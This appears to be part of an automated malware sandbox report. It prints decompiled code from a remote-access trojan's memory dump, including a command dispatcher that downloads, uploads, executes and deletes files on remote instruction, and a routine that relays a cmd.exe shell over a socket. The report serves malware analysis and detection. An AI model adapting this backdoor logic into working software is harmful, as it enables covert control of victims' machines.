                                          • API String ID: 724789610-0
                                          • Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                          • Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
                                          • Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                          • Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004027D1, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Deallocate.LIBCONCRT ref: 00402E92
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: Deallocatestd::_
                                          • String ID:
                                          • API String ID: 1323251999-0
                                          • Opcode ID: fd0bdf4a69064b2d18053eefdb382f6c1a1f7578bd22aecd9d5e55026fa2e620
                                          • Instruction ID: 0585d7854aa17f8529017161725170d480745bba6486c72941cee94cd88e15ee
                                          • Opcode Fuzzy Hash: fd0bdf4a69064b2d18053eefdb382f6c1a1f7578bd22aecd9d5e55026fa2e620
                                          • Instruction Fuzzy Hash: 55C08C3208420C73CA0029C2EC06E76BB8D9720760F008032FE48281A1E5B3A970E2DA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00441BCD, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C02
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C0E
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C19
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C24
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C2F
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C3A
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C45
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C50
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C5B
                                            • Part of subcall function 00441BEE: _free.LIBCMT ref: 00441C69
                                          • _free.LIBCMT ref: 00441BE3
                                            • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                            • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 5a573350e6ddf2cbe17fb8b5a81c8fc1f0d6ba8db1d73aa804a9b01c0be63fe0
                                          • Instruction ID: a2f371d71a0f241558f99d9b3abe3ad1a2aacf2862895acb67ffd0633313f50b
                                          • Opcode Fuzzy Hash: 5a573350e6ddf2cbe17fb8b5a81c8fc1f0d6ba8db1d73aa804a9b01c0be63fe0
                                          • Instruction Fuzzy Hash: 3FC0123200C34CBBFB053A55D846E593B99DB90354F10802BB60D08071AF36B9E1D58C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404E0B, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 13468e592387e6b0bb73e95ce9a68b7d52693f52b58467605d5206de11d35af6
                                          • Instruction ID: eb1b9387b60eb41774d792694da73fcf923298404fde03e5c9c312fc5c9b7129
                                          • Opcode Fuzzy Hash: 13468e592387e6b0bb73e95ce9a68b7d52693f52b58467605d5206de11d35af6
                                          • Instruction Fuzzy Hash: C3D0A771400B204FE3359B14EE0E75277E1AF01B26F008A2E91F7028E1C7B5AC40CB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042226A, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: send
                                          • String ID:
                                          • API String ID: 2809346765-0
                                          • Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                          • Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
                                          • Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                          • Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040697D, Relevance: 35.7, APIs: 7, Strings: 13, Instructions: 697COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E0040697D(short* __edx, void* __eflags, intOrPtr _a4) {
				char _v108;
				void* _v112;
				char _v132;
				char _v136;
				char _v140;
				char _v152;
				char _v156;
				char _v160;
				void* _v176;
				char _v180;
				char _v192;
				void* _v204;
				char _v208;
				char _v212;
				char _v216;
				void* _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				void* _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				char _v296;
				void* _v300;
				void* _v308;
				void* _v312;
				char _v324;
				char _v336;
				char _v344;
				char _v348;
				char _v368;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t160;
				signed int _t162;
				void* _t166;
				void* _t171;
				signed int _t172;
				void* _t187;
				void* _t202;
				signed int _t204;
				void* _t218;
				int _t228;
				void* _t235;
				void* _t236;
				void* _t249;
				void* _t256;
				signed int _t261;
				void* _t265;
				void* _t277;
				short* _t288;
				void* _t289;
				void* _t300;
				void* _t316;
				void* _t326;
				void* _t332;
				void* _t334;
				void* _t336;
				void* _t340;
				void* _t344;
				void* _t354;
				void* _t356;
				void* _t377;
				void* _t380;
				void* _t542;
				void* _t569;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t576;
				signed int _t578;
				signed int _t581;
				void* _t588;
				void* _t590;
				void* _t592;
				void* _t594;
				void* _t596;
				signed int _t597;
				void* _t600;
				void* _t601;
				void* _t602;
				void* _t603;
				void* _t604;
				void* _t605;
				void* _t606;
				void* _t609;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t618;
				void* _t620;
				void* _t639;
				void* _t640;
				void* _t641;
				void* _t642;
				void* _t645;
				void* _t647;

				_t646 = __eflags;
				_t550 = __edx;
				_push(_t356);
				_t574 = _a4;
				_push(_t569);
				E004020EC(_t356,  &_v156, __edx, __eflags, _t574 + 0x1c);
				SetEvent( *(_t574 + 0x34));
				_t575 =  *((intOrPtr*)(L00401F95( &_v160)));
				E004042A6( &_v160,  &_v136, 4, 0xffffffff);
				_t600 = (_t597 & 0xfffffff8) - 0xec;
				E004020EC(0x46c238, _t600, _t550, _t646, 0x46c238);
				_t601 = _t600 - 0x18;
				E004020EC(0x46c238, _t601, _t550, _t646,  &_v152);
				E00417478( &_v288, _t550);
				_t602 = _t601 + 0x30;
				_t647 = _t575 - 0x8b;
				if(_t647 > 0) {
					_t576 = _t575 - 0x8c;
					__eflags = _t576;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t160 = GetFileAttributesW(L00401EEB( &_v260));
						__eflags = _t160 & 0x00000010;
						if((_t160 & 0x00000010) == 0) {
							_t162 = DeleteFileW(L00401EEB( &_v260));
						} else {
							_t162 = E00417754(L00401EEB( &_v260));
						}
						__eflags = _t162;
						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
						if(__eflags == 0) {
							_t603 = _t602 - 0x18;
							E0041739C(0x46c238, _t603,  &_v252);
							_push(0x55);
							E00404AA4(0x46c238, 0x46c2e8,  &_v252, __eflags);
							_t166 = E0041733B( &_v208,  &_v280);
							_t604 = _t603 - 0x18;
							_t553 = "Unable to delete: ";
							E004075C2(0x46c238, _t604, "Unable to delete: ", _t569, __eflags, _t166);
							_t605 = _t604 - 0x14;
							_t377 = _t605;
							_push("[ERROR]");
						} else {
							_t187 = E0041733B( &_v180,  &_v252);
							_t609 = _t602 - 0x18;
							_t553 = "Deleted file: ";
							E004075C2(0x46c238, _t609, "Deleted file: ", _t569, __eflags, _t187);
							_t605 = _t609 - 0x14;
							_t377 = _t605;
							_push("[Info]");
						}
						E00402084(0x46c238, _t377);
						L00416C80(0x46c238, _t569);
						_t606 = _t605 + 0x30;
						E00401FC7();
						_t171 = L00401E49( &_v288, _t553, __eflags, 1);
						_t550 = "1";
						_t380 = _t171;
						_t172 = L00405A6F("1");
						__eflags = _t172;
						if(_t172 == 0) {
							L40:
							L00401EF0();
							L41:
							L00401E74( &_v284, _t550);
							E00401FC7();
							E00401FC7();
							return 0;
						} else {
							__eflags = E00407323( &_v272, _t380, _t380) + 1;
							E0040733F(E00407323( &_v272, _t380, _t380) + 1);
							_t550 =  &_v284;
							L00401EFA( &_v284,  &_v284, _t576, L00402FFA(0x46c238,  &_v212,  &_v284, 0x2a));
							L00401EF0();
							E0040427F(0x46c238, _t606 - 0x18, L00401EEB( &_v288));
							L39:
							E004061C3();
							goto L40;
						}
					}
					_t578 = _t576 - 1;
					__eflags = _t578;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						E0040427F(0x46c238,  &_v216, L00401F95(L00401E49( &_v272, _t550, __eflags, 1)));
						E00407309( &_v276,  &_v252, 0, E00407323( &_v268,  &_v216,  &_v216) + 1);
						_t202 = L00401EEB(E00407629( &_v216,  &_v264,  &_v240));
						_t204 = E00439924(L00401EEB( &_v288), _t202);
						asm("sbb bl, bl");
						L00401EF0();
						_t361 =  ~_t204 + 1;
						__eflags =  ~_t204 + 1;
						if(__eflags == 0) {
							_t550 = E004075E6( &_v180, "Unable to rename file!", __eflags, 0x46c238);
							E00405343(_t361, _t602 - 0x18, _t206, _t569, __eflags, "16");
							_push(0x59);
							E00404AA4(_t361, 0x46c2e8, _t206, __eflags);
							E00401FC7();
						} else {
							_t550 =  &_v228;
							E00407514(_t602 - 0x18,  &_v228, __eflags, "*");
							E004061C3();
						}
						L00401EF0();
						L13:
						L00401EF0();
						goto L40;
					}
					_t581 = _t578 - 1;
					__eflags = _t581;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
						_t218 = L00401F95(L00401E49( &_v272, _t550, __eflags, 1));
						_t550 =  &_v264;
						CreateDirectoryW(L00401EEB(E00407514( &_v192,  &_v264, __eflags, _t218)), 0);
						L00401EF0();
						E00403300(0x2a);
						E00407350(0x46c238, _t602 - 0x18,  &_v264, __eflags,  &_v268);
						goto L39;
					}
					_t583 = _t581 - 3;
					__eflags = _t581 - 3;
					if(__eflags == 0) {
						_t228 = StrToIntA(L00401F95(L00401E49( &_v264, _t550, __eflags, _t583)));
						_t550 = L00401F95(L00401E49( &_v268, _t550, __eflags, 1));
						L00417F10(_t228, _t230);
					}
					goto L41;
				}
				if(_t647 == 0) {
					E004020D5(0x46c238,  &_v180);
					E0040484E(0x46c238,  &_v108, 1);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00404A08(_t550);
					_t235 = L00401E49( &_v284, _t550, __eflags, 3);
					_t614 = _t602 - 0xfffffffffffffff8;
					_t236 = L00401E49( &_v288, _t550, __eflags, 2);
					L00402F93(0x46c238, _t614, L00402F93(0x46c238,  &_v236, L00402F93(0x46c238,  &_v260, L00402FB7( &_v284, L00401E49( &_v292, _t550, __eflags, 1), 0x46c238), __eflags, _t236), __eflags, 0x46c238), __eflags, _t235);
					E00404AA4(0x46c238,  &_v140, _t240, __eflags);
					E00401FC7();
					E00401FC7();
					E00401FC7();
					E0040427F(0x46c238,  &_v292, L00401F95(L00401E49( &_v324, _t240, __eflags, 0)));
					_t249 = E0041733B( &_v272,  &_v296);
					_t615 = _t614 - 0x18;
					E004075C2(0x46c238, _t615, "Downloading file: ", _t602 - 0x10, __eflags, _t249);
					_t616 = _t615 - 0x14;
					E00402084(0x46c238, _t616, "[Info]");
					L00416C80(0x46c238, "[Info]");
					E00401FC7();
					L00401EF0();
					_t256 = L00401F95(L00401E49( &_v336, "Downloading file: ", __eflags, 0));
					_t618 = _t616 + 0x30 - 0x18;
					E0040427F(0x46c238, _t618, _t256);
					_t261 = E004062D8( &_v192, __eflags, E004398A0(_t258, L00401F95(L00401E49( &_v344, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
					_t620 = _t618 + 0x2c;
					_push(0);
					__eflags = _t261;
					if(__eflags == 0) {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t265 = E0041733B( &_v244,  &_v268);
						_t550 = "Failed to download file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Failed to download file: ", "[Info]", __eflags, _t265);
						E00402084(0x46c238, _t620 - 4, "[ERROR]");
						L00416C80(0x46c238, "[Info]");
						E00401FC7();
						L00401EF0();
					} else {
						E0040427F(0x46c238,  &_v264, L00401F95(L00401E49( &_v348, "Downloading file: ", __eflags)));
						_t277 = E0041733B( &_v244,  &_v268);
						_t550 = "Downloaded file: ";
						E004075C2(0x46c238, _t620 - 0x18, "Downloaded file: ", "[Info]", __eflags, _t277);
						E00402084(0x46c238, _t620 - 4, "[Info]");
						L00416C80(0x46c238, "[Info]");
						E00401FC7();
						L00401EF0();
						E00402084(0x46c238, _t620 - 4 + 0x30 - 0x18, 0x45f6bc);
						_push(0x58);
						E00404AA4(0x46c238,  &_v156, "Downloaded file: ", __eflags);
					}
					E00404E0B( &_v140);
					L00404E2F(0x46c238,  &_v140, 0);
					L15:
					E00401FC7();
					goto L41;
				}
				_t588 = _t575 - 0x61;
				if(_t588 == 0) {
					E0040427F(0x46c238, _t602 - 0x18, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					_t288 = L00401E49( &_v272, _t550, __eflags, 2);
					_t289 = L00401E49( &_v276, _t550, __eflags, 1);
					_t550 = _t288;
					E004169CC(_t289, _t288);
					goto L41;
				}
				_t590 = _t588 - 0x26;
				if(_t590 == 0) {
					GetLogicalDriveStringsA(0x64,  &_v108);
					E004020AB(0x46c238,  &_v252, _t550, __eflags,  &_v108, 0x64);
					__eflags = E00407397( &_v260, 0x45f860, 0, 2) + 1;
					L00401F84(E00407397( &_v260, 0x45f860, 0, 2) + 1);
					E004020EC(0x46c238, _t602 - 0x18, _t550, E00407397( &_v260, 0x45f860, 0, 2) + 1,  &_v276);
					_t300 = E00406406(0x46c238,  &_v256);
					_t550 = L00402FB7( &_v232,  &_v280, 0x46c238);
					L00402F1D(_t602 - 0x18, _t301, _t300);
					_push(0x51);
					E00404AA4(0x46c238, 0x46c2e8, _t301, __eflags);
					E00401FC7();
					E00401FC7();
					goto L15;
				}
				_t592 = _t590 - 1;
				if(_t592 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					E00407350(0x46c238, _t602 - 0x18, _t550, __eflags,  &_v260);
					E004061C3();
					__eflags = E00402489() - 2;
					_t316 = E0041733B( &_v228, E00407309( &_v264,  &_v240, 0, E00402489() - 2));
					_t550 = "Browsing directory: ";
					E004075C2(0x46c238, _t602 - 0x18 + 0x18 - 0x18, "Browsing directory: ", _t569, E00402489() - 2, _t316);
					E00402084(0x46c238, _t602 - 0x18 + 0x18 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					E00401FC7();
					goto L13;
				}
				_t594 = _t592 - 1;
				if(_t594 == 0) {
					E0040427F(0x46c238,  &_v256, L00401F95(L00401E49( &_v264, _t550, __eflags, 0)));
					ShellExecuteW(0, L"open", L00401EEB( &_v260), 0, 0, 1);
					_t326 = E0041733B( &_v212,  &_v260);
					_t550 = "Executing file: ";
					E004075C2(0x46c238, _t602 - 0x18, "Executing file: ", _t569, __eflags, _t326);
					E00402084(0x46c238, _t602 - 4, "[Info]");
					L00416C80(0x46c238, _t569);
					E00401FC7();
					goto L40;
				} else {
					_t596 = _t594 - 1;
					_t652 = _t596;
					if(_t596 == 0) {
						E004072F6( &_v108);
						_t332 = L00401E49( &_v264, _t550, _t652, 3);
						_t639 = _t602 - 0x18;
						E004020EC(0x46c238, _t639, _t550, _t652, _t332);
						_t334 = L00401E49( &_v272, _t550, _t652, 2);
						_t640 = _t639 - 0x18;
						E004020EC(0x46c238, _t640, _t550, _t652, _t334);
						_t336 = L00401E49( &_v280, _t550, _t652, 1);
						_t641 = _t640 - 0x18;
						E004020EC(0x46c238, _t641, _t550, _t652, _t336);
						_push(L00401F95(L00401E49( &_v288, _t550, _t652, _t596)));
						_t340 = E004064A2( &_v136, _t550);
						_push(_t596);
						_t653 = _t340;
						if(_t340 == 0) {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, __eflags)));
							_t344 = E0041733B( &_v232,  &_v256);
							_t642 = _t641 - 0x18;
							_t550 = "Failed to upload file: ";
							E004075C2(0x46c238, _t642, "Failed to upload file: ", _t569, __eflags, _t344);
							_t542 = _t642 - 0x14;
							_push("[ERROR]");
						} else {
							E0040427F(0x46c238,  &_v252, L00401F95(L00401E49( &_v368, _t550, _t653)));
							_t354 = E0041733B( &_v232,  &_v256);
							_t645 = _t641 - 0x18;
							_t550 = "Uploaded file: ";
							E004075C2(0x46c238, _t645, "Uploaded file: ", _t569, _t653, _t354);
							_t542 = _t645 - 0x14;
							_push("[Info]");
						}
						E00402084(0x46c238, _t542);
						L00416C80(0x46c238, _t569);
						E00401FC7();
						L00401EF0();
						L00407304(0x46c238,  &_v132, _t596);
					}
					goto L41;
				}
			}
















































































































                                          0x0040697d
                                          0x0040697d
                                          0x0040698d
                                          0x0040698f
                                          0x00406992
                                          0x00406997
                                          0x0040699f
                                          0x004069b9
                                          0x004069c3
                                          0x004069c8
                                          0x004069d3
                                          0x004069d8
                                          0x004069e5
                                          0x004069ee
                                          0x004069f8
                                          0x004069fb
                                          0x004069fd
                                          0x00406fad
                                          0x00406fad
                                          0x00406fb3
                                          0x00407198
                                          0x004071a7
                                          0x004071b1
                                          0x004071b3
                                          0x004071c9
                                          0x004071b5
                                          0x004071bc
                                          0x004071bc
                                          0x004071cf
                                          0x004071d8
                                          0x004071da
                                          0x00407201
                                          0x00407206
                                          0x0040720b
                                          0x00407212
                                          0x0040721f
                                          0x00407224
                                          0x00407227
                                          0x0040722f
                                          0x00407234
                                          0x00407237
                                          0x00407239
                                          0x004071dc
                                          0x004071e0
                                          0x004071e5
                                          0x004071e8
                                          0x004071f0
                                          0x004071f5
                                          0x004071f8
                                          0x004071fa
                                          0x004071fa
                                          0x0040723e
                                          0x00407243
                                          0x00407248
                                          0x0040724f
                                          0x0040725a
                                          0x0040725f
                                          0x00407264
                                          0x00407266
                                          0x0040726b
                                          0x0040726d
                                          0x004072c4
                                          0x004072c8
                                          0x004072cd
                                          0x004072d1
                                          0x004072dd
                                          0x004072e6
                                          0x004072f3
                                          0x0040726f
                                          0x0040727a
                                          0x00407280
                                          0x00407287
                                          0x0040729a
                                          0x004072a3
                                          0x004072b7
                                          0x004072bc
                                          0x004072bc
                                          0x00000000
                                          0x004072c1
                                          0x0040726d
                                          0x00406fb9
                                          0x00406fb9
                                          0x00406fbc
                                          0x00407097
                                          0x004070b3
                                          0x004070cf
                                          0x004070e9
                                          0x004070f9
                                          0x00407108
                                          0x0040710a
                                          0x0040710f
                                          0x0040710f
                                          0x00407112
                                          0x00407150
                                          0x00407154
                                          0x0040715a
                                          0x00407161
                                          0x0040716a
                                          0x00407114
                                          0x00407117
                                          0x00407122
                                          0x00407128
                                          0x0040712d
                                          0x00407173
                                          0x00406c5f
                                          0x00406c5f
                                          0x00000000
                                          0x00406c5f
                                          0x00406fc2
                                          0x00406fc2
                                          0x00406fc5
                                          0x00407022
                                          0x00407035
                                          0x0040703b
                                          0x00407051
                                          0x0040705b
                                          0x00407066
                                          0x00407075
                                          0x00000000
                                          0x00407075
                                          0x00406fc7
                                          0x00406fc7
                                          0x00406fca
                                          0x00406fe2
                                          0x00406ffc
                                          0x00407000
                                          0x00407000
                                          0x00000000
                                          0x00406fca
                                          0x00406a03
                                          0x00406d53
                                          0x00406d61
                                          0x00406d77
                                          0x00406d78
                                          0x00406d79
                                          0x00406d7a
                                          0x00406d7b
                                          0x00406d86
                                          0x00406d8b
                                          0x00406d98
                                          0x00406dd2
                                          0x00406de1
                                          0x00406dea
                                          0x00406df3
                                          0x00406dfc
                                          0x00406e19
                                          0x00406e26
                                          0x00406e2b
                                          0x00406e36
                                          0x00406e3b
                                          0x00406e46
                                          0x00406e4b
                                          0x00406e57
                                          0x00406e60
                                          0x00406e71
                                          0x00406e76
                                          0x00406e7c
                                          0x00406ea8
                                          0x00406ead
                                          0x00406eb4
                                          0x00406eb5
                                          0x00406eb7
                                          0x00406f41
                                          0x00406f4e
                                          0x00406f56
                                          0x00406f5e
                                          0x00406f6d
                                          0x00406f72
                                          0x00406f7e
                                          0x00406f87
                                          0x00406eb9
                                          0x00406eca
                                          0x00406ed7
                                          0x00406edf
                                          0x00406ee7
                                          0x00406ef2
                                          0x00406ef7
                                          0x00406f03
                                          0x00406f0c
                                          0x00406f1b
                                          0x00406f20
                                          0x00406f29
                                          0x00406f29
                                          0x00406f93
                                          0x00406f9f
                                          0x00406cff
                                          0x00406cff
                                          0x00000000
                                          0x00406cff
                                          0x00406a09
                                          0x00406a0c
                                          0x00406d21
                                          0x00406d2c
                                          0x00406d39
                                          0x00406d3e
                                          0x00406d42
                                          0x00000000
                                          0x00406d47
                                          0x00406a12
                                          0x00406a15
                                          0x00406c73
                                          0x00406c87
                                          0x00406c9e
                                          0x00406ca4
                                          0x00406cb3
                                          0x00406cbc
                                          0x00406cd3
                                          0x00406cd7
                                          0x00406cdd
                                          0x00406ce4
                                          0x00406ced
                                          0x00406cf6
                                          0x00000000
                                          0x00406cfb
                                          0x00406a1b
                                          0x00406a1e
                                          0x00406be8
                                          0x00406bf7
                                          0x00406bfc
                                          0x00406c0d
                                          0x00406c26
                                          0x00406c2e
                                          0x00406c36
                                          0x00406c45
                                          0x00406c4a
                                          0x00406c56
                                          0x00000000
                                          0x00406c5b
                                          0x00406a24
                                          0x00406a27
                                          0x00406b6f
                                          0x00406b88
                                          0x00406b96
                                          0x00406b9e
                                          0x00406ba6
                                          0x00406bb5
                                          0x00406bba
                                          0x00406bc6
                                          0x00000000
                                          0x00406a2d
                                          0x00406a2d
                                          0x00406a2d
                                          0x00406a30
                                          0x00406a3d
                                          0x00406a48
                                          0x00406a4d
                                          0x00406a53
                                          0x00406a5e
                                          0x00406a63
                                          0x00406a69
                                          0x00406a74
                                          0x00406a79
                                          0x00406a7f
                                          0x00406a95
                                          0x00406a9d
                                          0x00406aa6
                                          0x00406aa7
                                          0x00406aa9
                                          0x00406afb
                                          0x00406b08
                                          0x00406b0d
                                          0x00406b10
                                          0x00406b18
                                          0x00406b20
                                          0x00406b22
                                          0x00406aab
                                          0x00406abc
                                          0x00406ac9
                                          0x00406ace
                                          0x00406ad1
                                          0x00406ad9
                                          0x00406ae1
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406b27
                                          0x00406b2c
                                          0x00406b38
                                          0x00406b41
                                          0x00406b4d
                                          0x00406b4d
                                          0x00000000
                                          0x00406a30

                                          APIs
                                          • SetEvent.KERNEL32(?,?), ref: 0040699F
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406B88
                                            • Part of subcall function 004064A2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                            • Part of subcall function 004062D8: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,[Info],00000000,0046C238,?,00406EAD,00000000), ref: 00406331
                                            • Part of subcall function 004062D8: WriteFile.KERNEL32(?,?,00000000,00406EAD,00000000,?,000186A0,00406EAD,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 00406379
                                            • Part of subcall function 004062D8: CloseHandle.KERNEL32(00000000,?,00406EAD,00000000,?,?,0000000A,00000000), ref: 004063B3
                                            • Part of subcall function 004062D8: MoveFileW.KERNEL32(00000000,00000000), ref: 004063CB
                                            • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                            • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406C73
                                          • StrToIntA.SHLWAPI(00000000,?), ref: 00406FE2
                                          • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 00407051
                                            • Part of subcall function 004061C3: FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[ERROR]$[Info]$open
                                          • API String ID: 4189642951-1986272625
                                          • Opcode ID: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
                                          • Instruction ID: 2a12d23acd30ce868743ee3b5d09fdf4f29f8ef519bcce84dbcc6bced154e8ad
                                          • Opcode Fuzzy Hash: 1f6703755000767a5f67cd65e7268118d2d2a33c34c8fd2d2e666a0488e9e463
                                          • Instruction Fuzzy Hash: BD3292716183015BC608F776C8569AF77A9AF91348F40093FF942671E3EF389A09C69B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004055EA, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283pipesleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 0040563C
                                            • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                          • __Init_thread_footer.LIBCMT ref: 00405679
                                          • CreatePipe.KERNEL32(0046DCE4,0046DCCC,0046DC08,00000000,0045F6D4,00000000), ref: 00405704
                                          • CreatePipe.KERNEL32(0046DCD0,0046DCEC,0046DC08,00000000), ref: 0040571A
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046DC18,0046DCD4), ref: 0040578D
                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 004057F4
                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040581C
                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405845
                                            • Part of subcall function 0042F49E: __onexit.LIBCMT ref: 0042F4A4
                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6D8,00000062,0045F6BC), ref: 00405932
                                          • Sleep.KERNEL32(00000064,00000062,0045F6BC), ref: 0040594B
                                          • TerminateProcess.KERNEL32(00000000), ref: 00405964
                                          • CloseHandle.KERNEL32 ref: 00405970
                                          • CloseHandle.KERNEL32 ref: 0040597C
                                          • CloseHandle.KERNEL32 ref: 00405992
                                          • CloseHandle.KERNEL32 ref: 0040599E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                          • String ID: SystemDrive$cmd.exe
                                          • API String ID: 2994406822-3633465311
                                          • Opcode ID: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
                                          • Instruction ID: 55ed603c712564892f9c2332be2a793e9955a409e8b955cd36c8b06ecb557e64
                                          • Opcode Fuzzy Hash: a42ed005172c4764f8bd6619dc74f8f2985c3de3d202e710ebc583925a73323b
